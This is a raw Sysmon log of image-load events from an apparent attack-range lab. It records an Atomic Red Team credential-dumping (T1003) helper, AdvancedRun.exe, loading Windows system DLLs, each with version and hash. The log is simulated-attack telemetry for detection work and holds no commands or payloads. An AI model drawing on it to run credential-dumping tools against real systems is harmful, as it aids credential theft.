17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003952911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.496{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 